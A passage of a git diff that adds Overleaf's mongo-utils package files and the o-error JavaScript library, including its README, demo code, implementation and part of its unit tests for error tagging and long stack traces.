update(nextBatch) + } else { + await performUpdate(collection, nextBatch, update) + } + } + console.error(`Completed batch ending ${renderObjectId(end)}`) + start = end + } + return updated + } finally { + BATCHED_UPDATE_RUNNING = false + } +} + +/** + * @param {Collection | LegacyCollection} collection + * @param {Document} query + * @param {UpdateDocument | ((batch: Array) => Promise)} update + * @param {Document} [projection] + * @param {FindOptions} [findOptions] + * @param {BatchedUpdateOptions} [batchedUpdateOptions] + */ +function batchedUpdateWithResultHandling( + collection, + query, + update, + projection, + findOptions, + batchedUpdateOptions +) { + batchedUpdate( + collection, + query, + update, + projection, + findOptions, + batchedUpdateOptions + ) + .then(processed => { + console.error({ processed }) + process.exit(0) + }) + .catch(error => { + console.error({ error }) + process.exit(1) + }) +} + +module.exports = { + READ_PREFERENCE_SECONDARY, + objectIdFromInput, + renderObjectId, + batchedUpdate, + batchedUpdateWithResultHandling, +} diff --git a/libraries/mongo-utils/buildscript.txt b/libraries/mongo-utils/buildscript.txt new file mode 100644 index 0000000..a4e4fe7 --- /dev/null +++ b/libraries/mongo-utils/buildscript.txt @@ -0,0 +1,10 @@ +mongo-utils +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/mongo-utils/index.js b/libraries/mongo-utils/index.js new file mode 100644 index 0000000..e69de29 diff --git a/libraries/mongo-utils/package.json b/libraries/mongo-utils/package.json new file mode 100644 index 0000000..51e2148 --- /dev/null +++ b/libraries/mongo-utils/package.json @@ -0,0 +1,30 @@ +{ + "name": "@overleaf/mongo-utils", + "version": "0.0.1", + "description": "utilities to help working with mongo", + "main": "index.js", + "scripts": { + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "test:ci": "npm run test:unit", + "types:check": "tsc --noEmit" + }, + "author": "Overleaf (https://www.overleaf.com)", + "license": "AGPL-3.0-only", + "dependencies": { + "mongodb": "6.12.0", + "mongodb-legacy": "6.1.3" + }, + "devDependencies": { + "chai": "^4.3.6", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } +} diff --git a/libraries/mongo-utils/test/setup.js b/libraries/mongo-utils/test/setup.js new file mode 100644 index 0000000..78e563f --- /dev/null +++ b/libraries/mongo-utils/test/setup.js @@ -0,0 +1,11 @@ +const chai = require('chai') +const sinonChai = require('sinon-chai') +const SandboxedModule = require('sandboxed-module') + +// Chai configuration +chai.should() +chai.use(sinonChai) + +SandboxedModule.configure({ + globals: { Buffer, JSON, console, process }, +}) diff --git a/libraries/mongo-utils/tsconfig.json b/libraries/mongo-utils/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/mongo-utils/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/o-error/.editorconfig b/libraries/o-error/.editorconfig new file mode 100644 index 0000000..9d08a1a --- /dev/null +++ b/libraries/o-error/.editorconfig @@ -0,0 +1,9 @@ +root = true + +[*] +charset = utf-8 +indent_style = space +indent_size = 2 +end_of_line = lf +insert_final_newline = true +trim_trailing_whitespace = true diff --git a/libraries/o-error/.gitignore b/libraries/o-error/.gitignore new file mode 100644 index 0000000..cf2f0ad --- /dev/null +++ b/libraries/o-error/.gitignore @@ -0,0 +1,5 @@ +.nyc_output +coverage +node_modules/ + +.npmrc diff --git a/libraries/o-error/.nvmrc b/libraries/o-error/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/o-error/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/o-error/CHANGELOG.md b/libraries/o-error/CHANGELOG.md new file mode 100644 index 0000000..6d1a61f --- /dev/null +++ b/libraries/o-error/CHANGELOG.md @@ -0,0 +1,3 @@ +# @overleaf/o-error History + +Please see the [Releases on GitHub](https://github.com/overleaf/o-error/releases) for history. diff --git a/libraries/o-error/LICENSE b/libraries/o-error/LICENSE new file mode 100644 index 0000000..b301625 --- /dev/null +++ b/libraries/o-error/LICENSE @@ -0,0 +1,21 @@ +The MIT License + +Copyright (c) 2016-2018 Overleaf https://www.overleaf.com + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. diff --git a/libraries/o-error/README.md b/libraries/o-error/README.md new file mode 100644 index 0000000..cf6582b --- /dev/null +++ b/libraries/o-error/README.md @@ -0,0 +1,475 @@ +# @overleaf/o-error + +[![npm version](https://badge.fury.io/js/%40overleaf%2Fo-error.svg)](https://badge.fury.io/js/%40overleaf%2Fo-error) +[![CircleCI](https://circleci.com/gh/overleaf/o-error.svg?style=svg)](https://circleci.com/gh/overleaf/o-error) +[![Coverage Status](https://coveralls.io/repos/github/overleaf/o-error/badge.svg?branch=master)](https://coveralls.io/github/overleaf/o-error?branch=master) + +Light-weight helpers for handling JavaScript Errors in node.js and the browser. + +- Get long stack traces across async functions and callbacks with `OError.tag`. +- Easily make custom `Error` subclasses. +- Wrap internal errors, preserving the original errors for logging as `causes`. +- Play nice with error logging services by keeping data in attached `info` objects instead of the error message. + +## Table of Contents + + + +- [Long Stack Traces with `OError.tag`](#long-stack-traces-with-oerrortag) + * [The Problem](#the-problem) + * [The Solution](#the-solution) + * [Adding More Info](#adding-more-info) + * [`async`/`await`](#asyncawait) + * [Better Async Stack Traces in Node 12+](#better-async-stack-traces-in-node-12) + * [Caveat: Shared Error Instances](#caveat-shared-error-instances) +- [Create Custom Error Classes](#create-custom-error-classes) + * [Attaching Extra Info](#attaching-extra-info) + * [Wrapping an Internal Error](#wrapping-an-internal-error) +- [OError API Reference](#oerror-api-reference) + * [new OError(message, [info], [cause])](#new-oerrormessage-info-cause) + * [oError.withInfo(info) ⇒ this](#oerrorwithinfoinfo--this) + * [oError.withCause(cause) ⇒ this](#oerrorwithcausecause--this) + * [OError.maxTags : Number](#oerrormaxtags--number) + * [OError.tag(error, [message], [info]) ⇒ Error](#oerrortagerror-message-info--error) + * [OError.getFullInfo(error) ⇒ Object](#oerrorgetfullinfoerror--object) + * [OError.getFullStack(error) ⇒ string](#oerrorgetfullstackerror--string) +- [References](#references) + + + +## Long Stack Traces with `OError.tag` + +### The Problem + +While JavaScript errors have stack traces, they only go back to the start of the latest tick, so they are often not very useful. For example: + +```js +const demoDatabase = { + findUser(id, callback) { + process.nextTick(() => { + // return result asynchronously + if (id === 42) { + callback(null, { name: 'Bob' }) + } else { + callback(new Error('not found')) + } + }) + }, +} + +function sayHi1(userId, callback) { + demoDatabase.findUser(userId, (err, user) => { + if (err) return callback(err) + callback(null, 'Hi ' + user.name) + }) +} + +sayHi1(43, (err, result) => { + if (err) { + console.error(err) + } else { + console.log(result) + } +}) +``` + +The resulting error's stack trace doesn't make any mention of our `sayHi1` function; it starts at the `nextTick` built-in: + +``` +Error: not found + at process.nextTick (repl:8:18) + at process._tickCallback (internal/process/next_tick.js:61:11) +``` + +In practice, it's often even worse, like + +``` +DBError: socket connection refused + at someObscureLibraryFunction (...) + at ... +``` + +### The Solution + +Before passing the error to a callback, call the `OError.tag` function to capture a stack trace at the call site: + +```js +const OError = require('.') + +function sayHi2(userId, callback) { + demoDatabase.findUser(userId, (err, user) => { + if (err) return callback(OError.tag(err)) + callback(null, 'Hi ' + user.name) + }) +} + +sayHi2(43, (err, result) => { + if (err) { + console.error(OError.getFullStack(OError.tag(err))) + } else { + console.log(result) + } +}) +``` + +And use `OError.getFullStack` to reconstruct the full stack, including the tagged errors: + +``` +Error: not found + at process.nextTick (repl:8:18) + at process._tickCallback (internal/process/next_tick.js:61:11) +TaggedError + at demoDatabase.findUser (repl:3:37) + at process.nextTick (repl:8:9) + at process._tickCallback (internal/process/next_tick.js:61:11) +TaggedError + at sayHi2 (repl:3:46) + at demoDatabase.findUser (repl:3:21) + at process.nextTick (repl:8:9) + at process._tickCallback (internal/process/next_tick.js:61:11) +``` + +The full stack contains the original error's stack and also the `TaggedError` stacks. There's some redundancy, but it's better to have too much information than too little. + +### Adding More Info + +You can add more information at each `tag` call site: a message and an `info` object with custom properties. + +```js +function sayHi3(userId, callback) { + demoDatabase.findUser(userId, (err, user) => { + if (err) return callback(OError.tag(err, 'failed to find user', { userId })) + callback(null, 'Hi ' + user.name) + }) +} + +sayHi3(43, (err, result) => { + if (err) { + OError.tag(err, 'failed to say hi') + console.error(OError.getFullStack(err)) + console.error(OError.getFullInfo(err)) + } else { + console.log(result) + } +}) +``` + +The `OError.getFullInfo` property merges all of the `info`s from the tags together into one object. This logs a full stack trace with `failed to ...` annotations and an `info` object that contains the `userId` that it failed to find: + +``` +Error: not found + at process.nextTick (repl:8:18) + at process._tickCallback (internal/process/next_tick.js:61:11) +TaggedError: failed to find user + at demoDatabase.findUser (repl:3:37) + at process.nextTick (repl:8:9) + at process._tickCallback (internal/process/next_tick.js:61:11) +TaggedError: failed to say hi + at sayHi3 (repl:3:12) + at demoDatabase.findUser (repl:3:21) + at process.nextTick (repl:8:9) + at process._tickCallback (internal/process/next_tick.js:61:11) + +{ userId: 43 } +``` + +Logging this information (or reporting it to an error monitoring service) hopefully gives you a good start to figuring out what went wrong. + +### `async`/`await` + +The `OError.tag` approach works with both async/await and callback-oriented code. When using async/await, the pattern is to catch an error, tag it and rethrow: + +```js +const promisify = require('util').promisify +demoDatabase.findUserAsync = promisify(demoDatabase.findUser) + +async function sayHi4(userId) { + try { + const user = await demoDatabase.findUserAsync(userId) + return `Hi ${user.name}` + } catch (error) { + throw OError.tag(error, 'failed to find user', { userId }) + } +} + +async function main() { + try { + await sayHi4(43) + } catch (error) { + OError.tag(error, 'failed to say hi') + console.error(OError.getFullStack(error)) + console.error(OError.getFullInfo(error)) + } +} +main() +``` + +The resulting full stack trace points to `sayHi4` in `main`, as expected: + +``` +Error: not found + at process.nextTick (repl:8:18) + at process._tickCallback (internal/process/next_tick.js:61:11) +TaggedError: failed to find user + at sayHi4 (repl:6:18) + at process._tickCallback (internal/process/next_tick.js:68:7) +TaggedError: failed to say hi + at main (repl:5:12) + at process._tickCallback (internal/process/next_tick.js:68:7) + +{ userId: 43 } +``` + +### Better Async Stack Traces in Node 12+ + +The above output is from node 10. Node 12 has improved stack traces for async code that uses native promises. However, until your whole stack, including all libraries, is using async/await and native promises, you're still likely to get unhelpful stack traces. So, the tagging approach still adds value, even in node 12. (And the `info` from tagging can add value even to a good stack trace, because it can contain clues about the input the caused the error.) + +### Caveat: Shared Error Instances + +Some libraries, such as `ioredis`, may return the same `Error` instance to multiple callbacks. In this case, the tags may be misleading, because they will be a mixture of the different 'stacks' that lead to the error. You can either accept this or choose to instead wrap the errors from these libraries with new `OError` instances using `withCause`. + +In the worst case, a library that always returns a single instance of an error could cause a resource leak. To prevent this, `OError` will only add up to `OError.maxTags` (default 100) tags to a single Error instance. + +## Create Custom Error Classes + +Broadly speaking, there are two kinds of errors: those we try to recover from, and those for which we give up (i.e. a 5xx response in a web application). For the latter kind, we usually just want to log a message and stack trace useful for debugging, which `OError.tag` helps with. + +To recover from an error, we usually need to know what kind of error it was and perhaps to check some of its properties. Defining a custom Error subclass is a good way to do this. Callers can check the type of the error either with `instanceof` or using a custom property, such as `code`. + +With ES6 classes, creating a custom error subclass is mostly as simple as `extends Error`. One extra line is required to set the error's `name` appropriately, and inheriting from `OError` handles this implementation detail. Here's an example: + +```js +class UserNotFoundError extends OError { + constructor() { + super('user not found') + } +} + +try { + throw new UserNotFoundError() +} catch (error) { + console.error(`instanceof Error: ${error instanceof Error}`) + console.error( + `instanceof UserNotFoundError: ${error instanceof UserNotFoundError}` + ) + console.error(error.stack) +} +``` + +``` +instanceof Error: true +instanceof UserNotFoundError: true +UserNotFoundError: user not found + at repl:2:9 + ... +``` + +### Attaching Extra Info + +Whether for helping with error recovery or just for debugging, it is often helpful to include some of the state that caused the error in the error. One way to do this is to put it in the message, but this has a few problems: + +- Even if the error is later handled and recovered from, we spend time stringifying the state to add it to the error message. +- Error monitoring systems often look at the message when trying to group similar errors together, and they can get confused by the ever-changing messages. +- When using structured logging, you lose the ability to easily query or filter the logs based on the state; instead clever regexes may be required to get it out of the messages. + +Instead, `OError`s (and subclasses) support an `info` object that can contain arbitrary data. Using `info`, we might write the above example as: + +```js +class UserNotFoundError extends OError { + constructor(userId) { + super('user not found', { userId }) + } +} + +try { + throw new UserNotFoundError(123) +} catch (error) { + console.error(OError.getFullStack(error)) + console.error(OError.getFullInfo(error)) +} +``` + +``` +UserNotFoundError: user not found + at repl:2:9 + ... +{ userId: 123 } +``` + +The `OError.getFullInfo` helper merges the `info` on custom errors and any info added with `OError.tag` on its way up the stack. It is intended for use when logging errors. If trying to recover from an error that is known to be a `UserNotFoundError`, it is usually better to interrogate `error.info.userId` directly. + +### Wrapping an Internal Error + +Detecting a condition like 'user not found' in the example above often starts with an internal database error. It is possible to just let the internal database error propagate all the way up through the stack, but this makes the code more coupled to the internals of the database (or database driver). It is often cleaner to handle and wrap the internal error in one that is under your control. Tying up the examples above: + +```js +async function sayHi5(userId) { + try { + const user = await demoDatabase.findUserAsync(userId) + return `Hi ${user.name}` + } catch (error) { + if (error.message === 'not found') { + throw new UserNotFoundError(userId).withCause(error) + } + } +} + +async function main() { + try { + await sayHi5(43) + } catch (error) { + OError.tag(error, 'failed to say hi') + console.error(OError.getFullStack(error)) + console.error(OError.getFullInfo(error)) + } +} +main() +``` + +The output includes the wrapping error, the tag and the cause, together with the info: + +``` +UserNotFoundError: user not found + at sayHi5 (repl:7:13) + at process._tickCallback (internal/process/next_tick.js:68:7) +TaggedError: failed to say hi + at main (repl:5:12) + at process._tickCallback (internal/process/next_tick.js:68:7) +caused by: + Error: not found + at process.nextTick (repl:8:18) + at process._tickCallback (internal/process/next_tick.js:61:11) +{ userId: 43 } +``` + +## OError API Reference + + +* [OError](#OError) + * [new OError(message, [info], [cause])](#new_OError_new) + * _instance_ + * [.withInfo(info)](#OError+withInfo) ⇒ this + * [.withCause(cause)](#OError+withCause) ⇒ this + * _static_ + * [.maxTags](#OError.maxTags) : Number + * [.tag(error, [message], [info])](#OError.tag) ⇒ Error + * [.getFullInfo(error)](#OError.getFullInfo) ⇒ Object + * [.getFullStack(error)](#OError.getFullStack) ⇒ string + + + +### new OError(message, [info], [cause]) + +| Param | Type | Description | +| --- | --- | --- | +| message | string | as for built-in Error | +| [info] | Object | extra data to attach to the error | +| [cause] | Error | the internal error that caused this error | + + + +### oError.withInfo(info) ⇒ this +Set the extra info object for this error. + +**Kind**: instance method of [OError](#OError) + +| Param | Type | Description | +| --- | --- | --- | +| info | Object | extra data to attach to the error | + + + +### oError.withCause(cause) ⇒ this +Wrap the given error, which caused this error. + +**Kind**: instance method of [OError](#OError) + +| Param | Type | Description | +| --- | --- | --- | +| cause | Error | the internal error that caused this error | + + + +### OError.maxTags : Number +Maximum number of tags to apply to any one error instance. This is to avoid +a resource leak in the (hopefully unlikely) case that a singleton error +instance is returned to many callbacks. If tags have been dropped, the full +stack trace will include a placeholder tag `... dropped tags`. + +Defaults to 100. Must be at least 1. + +**Kind**: static property of [OError](#OError) + + +### OError.tag(error, [message], [info]) ⇒ Error +Tag debugging information onto any error (whether an OError or not) and +return it. + +**Kind**: static method of [OError](#OError) +**Returns**: Error - the modified `error` argument + +| Param | Type | Description | +| --- | --- | --- | +| error | Error | the error to tag | +| [message] | string | message with which to tag `error` | +| [info] | Object | extra data with wich to tag `error` | + +**Example** *(An error in a callback)* +```js +function findUser(name, callback) { + fs.readFile('/etc/passwd', (err, data) => { + if (err) return callback(OError.tag(err, 'failed to read passwd')) + // ... + }) +} +``` +**Example** *(A possible error in a callback)* +```js +function cleanup(callback) { + fs.unlink('/tmp/scratch', (err) => callback(err && OError.tag(err))) +} +``` +**Example** *(An error with async/await)* +```js +async function cleanup() { + try { + await fs.promises.unlink('/tmp/scratch') + } catch (err) { + throw OError.tag(err, 'failed to remove scratch file') + } +} +``` + + +### OError.getFullInfo(error) ⇒ Object +The merged info from any `tag`s and causes on the given error. + +If an info property is repeated, the last one wins. + +**Kind**: static method of [OError](#OError) + +| Param | Type | Description | +| --- | --- | --- | +| error | Error \| null \| undefined | any error (may or may not be an `OError`) | + + + +### OError.getFullStack(error) ⇒ string +Return the `stack` property from `error`, including the `stack`s for any +tagged errors added with `OError.tag` and for any `cause`s. + +**Kind**: static method of [OError](#OError) + +| Param | Type | Description | +| --- | --- | --- | +| error | Error \| null \| undefined | any error (may or may not be an `OError`) | + + +## References + +- [MDN: Error](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Error) +- [Error Handling in Node.js](https://www.joyent.com/node-js/production/design/errors) +- [verror](https://github.com/joyent/node-verror) +- [Custom JavaScript Errors in ES6](https://medium.com/@xjamundx/custom-javascript-errors-in-es6-aa891b173f87) +- [Custom errors, extending Error](https://javascript.info/custom-errors) +- https://gist.github.com/justmoon/15511f92e5216fa2624b (some tests are based largely on this gist) diff --git a/libraries/o-error/buildscript.txt b/libraries/o-error/buildscript.txt new file mode 100644 index 0000000..81d3eb3 --- /dev/null +++ b/libraries/o-error/buildscript.txt @@ -0,0 +1,10 @@ +o-error +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/o-error/doc/benchmark.js b/libraries/o-error/doc/benchmark.js new file mode 100644 index 0000000..4e1bf26 --- /dev/null +++ b/libraries/o-error/doc/benchmark.js @@ -0,0 +1,44 @@ +// +// A quick microbenchmark for OError.tag. +// +const OError = require('..') + +function benchmark(fn, repeats = 100000) { + const startTime = process.hrtime() + for (let i = 0; i < repeats; ++i) { + fn() + } + const elapsed = process.hrtime(startTime) + return elapsed[0] * 1e3 + elapsed[1] * 1e-6 +} + +function throwError() { + throw new Error('here is a test error') +} + +console.log( + 'no tagging: ', + benchmark(() => { + try { + throwError() + return 1 + } catch (error) { + return 0 + } + }), + 'ms' +) + +console.log( + 'tagging: ', + benchmark(() => { + try { + throwError() + return 1 + } catch (error) { + OError.tag(error, 'here is a test tag') + return 0 + } + }), + 'ms' +) diff --git a/libraries/o-error/doc/demo.js b/libraries/o-error/doc/demo.js new file mode 100644 index 0000000..9ebef2d --- /dev/null +++ b/libraries/o-error/doc/demo.js @@ -0,0 +1,141 @@ +// This is the code from the README. + +const OError = require('..') + +const demoDatabase = { + findUser(id, callback) { + process.nextTick(() => { + // return result asynchronously + if (id === 42) { + callback(null, { name: 'Bob' }) + } else { + callback(new Error('not found')) + } + }) + }, +} + +function sayHi1(userId, callback) { + demoDatabase.findUser(userId, (err, user) => { + if (err) return callback(err) + callback(null, 'Hi ' + user.name) + }) +} + +sayHi1(42, (err, result) => { + if (err) { + console.error(err) + } else { + console.log(result) + } +}) + +sayHi1(43, (err, result) => { + if (err) { + console.error(err) + } else { + console.log(result) + } +}) + +function sayHi2(userId, callback) { + demoDatabase.findUser(userId, (err, user) => { + if (err) return callback(OError.tag(err)) + callback(null, 'Hi ' + user.name) + }) +} + +sayHi2(43, (err, result) => { + if (err) { + console.error(OError.getFullStack(OError.tag(err))) + } else { + console.log(result) + } +}) + +function sayHi3(userId, callback) { + demoDatabase.findUser(userId, (err, user) => { + if (err) return callback(OError.tag(err, 'failed to find user', { userId })) + callback(null, 'Hi ' + user.name) + }) +} + +sayHi3(43, (err, result) => { + if (err) { + OError.tag(err, 'failed to say hi') + console.error(OError.getFullStack(err)) + console.error(OError.getFullInfo(err)) + } else { + console.log(result) + } +}) + +const promisify = require('node:util').promisify +demoDatabase.findUserAsync = promisify(demoDatabase.findUser) + +async function sayHi4NoHandling(userId) { + const user = await demoDatabase.findUserAsync(userId) + return `Hi ${user.name}` +} + +async function sayHi4(userId) { + try { + const user = await demoDatabase.findUserAsync(userId) + return `Hi ${user.name}` + } catch (error) { + throw OError.tag(error, 'failed to find user', { userId }) + } +} + +async function main() { + try { + await sayHi4NoHandling(43) + } catch (error) { + console.error(OError.getFullStack(error)) + console.error(OError.getFullInfo(error)) + } + + try { + await sayHi4(43) + } catch (error) { + OError.tag(error, 'failed to say hi') + console.error(OError.getFullStack(error)) + console.error(OError.getFullInfo(error)) + } +} +main() + +class UserNotFoundError extends OError { + constructor(userId) { + super('user not found', { userId }) + } +} + +try { + throw new UserNotFoundError(123) +} catch (error) { + console.error(OError.getFullStack(error)) + console.error(OError.getFullInfo(error)) +} + +async function sayHi5(userId) { + try { + const user = await demoDatabase.findUserAsync(userId) + return `Hi ${user.name}` + } catch (error) { + if (error.message === 'not found') { + throw new UserNotFoundError(userId).withCause(error) + } + } +} + +async function main2() { + try { + await sayHi5(43) + } catch (error) { + OError.tag(error, 'failed to say hi') + console.error(OError.getFullStack(error)) + console.error(OError.getFullInfo(error)) + } +} +main2() diff --git a/libraries/o-error/index.cjs b/libraries/o-error/index.cjs new file mode 100644 index 0000000..ef08b45 --- /dev/null +++ b/libraries/o-error/index.cjs @@ -0,0 +1,190 @@ +/** + * Light-weight helpers for handling JavaScript Errors in node.js and the + * browser. + */ +class OError extends Error { + /** + * @param {string} message as for built-in Error + * @param {Object} [info] extra data to attach to the error + * @param {Error} [cause] the internal error that caused this error + */ + constructor(message, info, cause) { + super(message) + this.name = this.constructor.name + if (info) this.info = info + if (cause) this.cause = cause + /** @private @type {Array | undefined} */ + this._oErrorTags // eslint-disable-line + } + + /** + * Set the extra info object for this error. + * + * @param {Object} info extra data to attach to the error + * @return {this} + */ + withInfo(info) { + this.info = info + return this + } + + /** + * Wrap the given error, which caused this error. + * + * @param {Error} cause the internal error that caused this error + * @return {this} + */ + withCause(cause) { + this.cause = cause + return this + } + + /** + * Tag debugging information onto any error (whether an OError or not) and + * return it. + * + * @example An error in a callback + * function findUser(name, callback) { + * fs.readFile('/etc/passwd', (err, data) => { + * if (err) return callback(OError.tag(err, 'failed to read passwd')) + * // ... + * }) + * } + * + * @example A possible error in a callback + * function cleanup(callback) { + * fs.unlink('/tmp/scratch', (err) => callback(err && OError.tag(err))) + * } + * + * @example An error with async/await + * async function cleanup() { + * try { + * await fs.promises.unlink('/tmp/scratch') + * } catch (err) { + * throw OError.tag(err, 'failed to remove scratch file') + * } + * } + * + * @param {Error} error the error to tag + * @param {string} [message] message with which to tag `error` + * @param {Object} [info] extra data with wich to tag `error` + * @return {Error} the modified `error` argument + */ + static tag(error, message, info) { + const oError = /** @type{OError} */ (error) + + if (!oError._oErrorTags) oError._oErrorTags = [] + + let tag + if (Error.captureStackTrace) { + // Hide this function in the stack trace, and avoid capturing it twice. + tag = /** @type TaggedError */ ({ name: 'TaggedError', message, info }) + Error.captureStackTrace(tag, OError.tag) + } else { + tag = new TaggedError(message || '', info) + } + + if (oError._oErrorTags.length >= OError.maxTags) { + // Preserve the first tag and add an indicator that we dropped some tags. + if (oError._oErrorTags[1] === DROPPED_TAGS_ERROR) { + oError._oErrorTags.splice(2, 1) + } else { + oError._oErrorTags[1] = DROPPED_TAGS_ERROR + } + } + oError._oErrorTags.push(tag) + + return error + } + + /** + * The merged info from any `tag`s and causes on the given error. + * + * If an info property is repeated, the last one wins. + * + * @param {Error | null | undefined} error any error (may or may not be an `OError`) + * @return {Object} + */ + static getFullInfo(error) { + const info = {} + + if (!error) return info + + const oError = /** @type{OError} */ (error) + + if (oError.cause) Object.assign(info, OError.getFullInfo(oError.cause)) + + if (typeof oError.info === 'object') Object.assign(info, oError.info) + + if (oError._oErrorTags) { + for (const tag of oError._oErrorTags) { + Object.assign(info, tag.info) + } + } + + return info + } + + /** + * Return the `stack` property from `error`, including the `stack`s for any + * tagged errors added with `OError.tag` and for any `cause`s. + * + * @param {Error | null | undefined} error any error (may or may not be an `OError`) + * @return {string} + */ + static getFullStack(error) { + if (!error) return '' + + const oError = /** @type{OError} */ (error) + + let stack = oError.stack || oError.message || '(no stack)' + + if (Array.isArray(oError._oErrorTags) && oError._oErrorTags.length) { + stack += `\n${oError._oErrorTags.map(tag => tag.stack).join('\n')}` + } + + const causeStack = oError.cause && OError.getFullStack(oError.cause) + if (causeStack) { + stack += '\ncaused by:\n' + indent(causeStack) + } + + return stack + } +} + +/** + * Maximum number of tags to apply to any one error instance. This is to avoid + * a resource leak in the (hopefully unlikely) case that a singleton error + * instance is returned to many callbacks. If tags have been dropped, the full + * stack trace will include a placeholder tag `... dropped tags`. + * + * Defaults to 100. Must be at least 1. + * + * @type {Number} + */ +OError.maxTags = 100 + +/** + * Used to record a stack trace every time we tag info onto an Error. + * + * @private + * @extends OError + */ +class TaggedError extends OError {} + +const DROPPED_TAGS_ERROR = /** @type{TaggedError} */ ({ + name: 'TaggedError', + message: '... dropped tags', + stack: 'TaggedError: ... dropped tags', +}) + +/** + * @private + * @param {string} string + * @return {string} + */ +function indent(string) { + return string.replace(/^/gm, ' ') +} + +module.exports = OError diff --git a/libraries/o-error/package.json b/libraries/o-error/package.json new file mode 100644 index 0000000..9e17e85 --- /dev/null +++ b/libraries/o-error/package.json @@ -0,0 +1,40 @@ +{ + "name": "@overleaf/o-error", + "version": "3.4.0", + "description": "Light-weight helpers for handling JavaScript Errors in node.js and the browser. Helps with long stack traces, Error subclasses, wrapping internal errors (causes), and attaching extra data to errors for logging.", + "keywords": [ + "browser", + "node", + "error", + "long stack trace", + "stack trace", + "stack", + "cause", + "verror" + ], + "main": "index.cjs", + "files": [ + "index.cjs" + ], + "scripts": { + "build": "npm run --silent test", + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "test:ci": "npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "types:check": "tsc --noEmit" + }, + "author": "Overleaf (https://www.overleaf.com)", + "license": "MIT", + "repository": "github:overleaf/o-error", + "devDependencies": { + "@types/chai": "^4.3.0", + "@types/node": "^18.17.4", + "chai": "^4.3.6", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } +} diff --git a/libraries/o-error/test/o-error-util.test.js b/libraries/o-error/test/o-error-util.test.js new file mode 100644 index 0000000..c86cec4 --- /dev/null +++ b/libraries/o-error/test/o-error-util.test.js @@ -0,0 +1,425 @@ +const { expect } = require('chai') +const { promisify } = require('node:util') + +const OError = require('..') + +const { + expectError, + expectFullStackWithoutStackFramesToEqual, +} = require('./support') + +describe('utils', function () { + describe('OError.tag', function () { + it('tags errors thrown from an async function', async function () { + const delay = promisify(setTimeout) + + async function foo() { + await delay(10) + throw new Error('foo error') + } + + async function bar() { + try { + await foo() + } catch (error) { + throw OError.tag(error, 'failed to bar', { bar: 'baz' }) + } + } + + async function baz() { + try { + await bar() + } catch (error) { + throw OError.tag(error, 'failed to baz', { baz: 'bat' }) + } + } + + try { + await baz() + expect.fail('should have thrown') + } catch (error) { + expectError(error, { + name: 'Error', + klass: Error, + message: 'Error: foo error', + firstFrameRx: /at foo/, + }) + expectFullStackWithoutStackFramesToEqual(error, [ + 'Error: foo error', + 'TaggedError: failed to bar', + 'TaggedError: failed to baz', + ]) + expect(OError.getFullInfo(error)).to.eql({ + bar: 'baz', + baz: 'bat', + }) + } + }) + + it('tags errors thrown from a promise rejection', async function () { + function foo() { + return new Promise((resolve, reject) => { + setTimeout(() => { + reject(new Error('foo error')) + }, 10) + }) + } + + async function bar() { + try { + await foo() + } catch (error) { + throw OError.tag(error, 'failed to bar', { bar: 'baz' }) + } + } + + async function baz() { + try { + await bar() + } catch (error) { + throw OError.tag(error, 'failed to baz', { baz: 'bat' }) + } + } + + try { + await baz() + expect.fail('should have thrown') + } catch (error) { + expectError(error, { + name: 'Error', + klass: Error, + message: 'Error: foo error', + firstFrameRx: /_onTimeout/, + }) + expectFullStackWithoutStackFramesToEqual(error, [ + 'Error: foo error', + 'TaggedError: failed to bar', + 'TaggedError: failed to baz', + ]) + expect(OError.getFullInfo(error)).to.eql({ + bar: 'baz', + baz: 'bat', + }) + } + }) + + it('tags errors yielded through callbacks', function (done) { + function foo(cb) { + setTimeout(() => { + cb(new Error('foo error')) + }, 10) + } + + function bar(cb) { + foo(err => { + if (err) { + return cb(OError.tag(err, 'failed to bar', { bar: 'baz' })) + } + cb() + }) + } + + function 